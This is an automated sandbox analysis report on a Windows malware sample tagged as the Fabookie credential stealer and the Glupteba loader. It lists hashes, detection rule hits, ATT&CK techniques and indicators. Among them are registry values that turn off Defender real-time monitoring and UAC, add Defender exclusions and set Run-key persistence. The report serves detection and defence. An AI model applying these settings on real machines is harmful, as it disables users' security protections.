fabookie | 1db51be940aaa061f7eb7ac18172cd11335e1be65f6d6161ee6529e8b84e70d0

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
06-02-2024 02:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Size

735KB
MD5

9f5cb3a9a4053a53063a9da9afbf6273
SHA1

b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e
SHA256

ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1
SHA512

aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26
SSDEEP

12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA

Score

10^/10

fabookie glupteba discovery dropper evasion loader persistence ransomware rootkit spyware stealer trojan upx

Malware Config

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/1012-332-0x0000000003210000-0x000000000333C000-memory.dmp	family_fabookie
behavioral1/memory/1012-348-0x0000000003210000-0x000000000333C000-memory.dmp	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 19 IoCs

resource	yara_rule
behavioral1/memory/1892-221-0x0000000002B80000-0x000000000346B000-memory.dmp	family_glupteba
behavioral1/memory/1892-230-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/436-247-0x0000000002A20000-0x000000000330B000-memory.dmp	family_glupteba
behavioral1/memory/436-252-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/992-343-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/992-357-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-433-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-449-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-450-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-474-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-480-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-482-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-485-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-487-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-489-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-508-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-510-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-527-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1104-529-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Windows security bypass 2 TTPs 50 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VhddhSPGXbTtC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bRqNyyoRErtjvvoSYdR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VhddhSPGXbTtC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dhLLEIdhIALPnfpL = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZxhFKVMZkuU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ufZtkZ7tU2q5FiNysG4oE1Wq.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\AZWNgyxeOHgkTeVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZxhFKVMZkuU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bRqNyyoRErtjvvoSYdR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dhLLEIdhIALPnfpL = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\nWiD3Z1XYXpGAzzD9VqNWAi0.exe = "0"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DgNUdOtsSAUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YPnijZjmU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\AZWNgyxeOHgkTeVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dhLLEIdhIALPnfpL = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dhLLEIdhIALPnfpL = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YPnijZjmU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\QsOWyYwTYYzuxBvOU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DgNUdOtsSAUn = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2284	bcdedit.exe
1552	bcdedit.exe
2628	bcdedit.exe
2912	bcdedit.exe
2244	bcdedit.exe
2220	bcdedit.exe
564	bcdedit.exe
2132	bcdedit.exe
2568	bcdedit.exe
2816	bcdedit.exe
2640	bcdedit.exe
2544	bcdedit.exe
1764	bcdedit.exe
2892	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1768	netsh.exe
2984	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EaqWLKVmxsvtyGBndPI6GGrJ.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BTNALCE3ItIxtTSbPsMh6hEH.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7gFN9Co01cTetimPwH1iqGga.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moGlR0rTzmyWgJN6H3WPyTrm.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UMRL8zmGBYYRuO134osnn6RO.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c2yOdCifl4Gm5bSAJcmz0h35.bat	CasPol.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RWvWF53elp9zgip0i3dpr2Xr.bat	CasPol.exe

Executes dropped EXE 18 IoCs

pid	Process
1892	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
436	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
1600	Eg3CbaPfPvlHomvqcshBcOpb.exe
1572	RzhzprthKDuW4ueMbFyqs795.exe
788	Eg3CbaPfPvlHomvqcshBcOpb.tmp
1012	4o87nTIv9I7pHUjJ8mV2Aynj.exe
2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe
2952	Install.exe
1624	Install.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
2844	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
1104	csrss.exe
2672	patch.exe
1584	injector.exe
1856	dsefix.exe
2968	windefender.exe
2808	windefender.exe
2772	HkvKokT.exe

Loads dropped DLL 35 IoCs

pid	Process
2792	CasPol.exe
2792	CasPol.exe
2792	CasPol.exe
2792	CasPol.exe
2792	CasPol.exe
2792	CasPol.exe
1600	Eg3CbaPfPvlHomvqcshBcOpb.exe
2792	CasPol.exe
1572	RzhzprthKDuW4ueMbFyqs795.exe
2792	CasPol.exe
2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe
2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe
2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe
2256	7yX7bPXAhwiqyCUH1kmdVYvP.exe
1572	RzhzprthKDuW4ueMbFyqs795.exe
2952	Install.exe
2952	Install.exe
2952	Install.exe
2952	Install.exe
1624	Install.exe
1624	Install.exe
1624	Install.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
868	Process not Found
2672	patch.exe
2672	patch.exe
2672	patch.exe
2672	patch.exe
2672	patch.exe
1104	csrss.exe
2672	patch.exe
2672	patch.exe
2672	patch.exe
1104	csrss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016cd6-219.dat	upx
behavioral1/files/0x0006000000016cd6-217.dat	upx
behavioral1/files/0x0006000000016cd6-215.dat	upx
behavioral1/memory/1572-229-0x0000000000300000-0x00000000007E8000-memory.dmp	upx
behavioral1/memory/1572-346-0x0000000000300000-0x00000000007E8000-memory.dmp	upx
behavioral1/memory/1572-437-0x0000000000300000-0x00000000007E8000-memory.dmp	upx
behavioral1/files/0x0005000000005b88-473.dat	upx
behavioral1/memory/2968-475-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x0005000000005b88-476.dat	upx
behavioral1/memory/2808-478-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2968-479-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/files/0x0005000000005b88-477.dat	upx
behavioral1/memory/2808-481-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2808-486-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral1/memory/2808-509-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ufZtkZ7tU2q5FiNysG4oE1Wq.exe = "0"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\nWiD3Z1XYXpGAzzD9VqNWAi0.exe = "0"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast	Install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
7	pastebin.com

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HkvKokT.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	HkvKokT.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HkvKokT.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2548 set thread context of 2792	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	30

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
File opened (read-only)	\??\VBoxMiniRdrDN	nWiD3Z1XYXpGAzzD9VqNWAi0.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\unins000.dat	Eg3CbaPfPvlHomvqcshBcOpb.tmp
File created	C:\Windows\is-O4TJQ.tmp	Eg3CbaPfPvlHomvqcshBcOpb.tmp
File opened for modification	C:\Windows\unins000.dat	Eg3CbaPfPvlHomvqcshBcOpb.tmp
File opened for modification	C:\Windows\rss	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
File opened for modification	C:\Windows\rss	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240206025929.cab	makecab.exe
File created	C:\Windows\Tasks\bvpltIhZgYsALGXQsd.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
File created	C:\Windows\rss\csrss.exe	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
File created	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1216	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2156	schtasks.exe
1312	schtasks.exe
1716	schtasks.exe
2804	schtasks.exe
2156	schtasks.exe
2288	schtasks.exe
908	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	windefender.exe
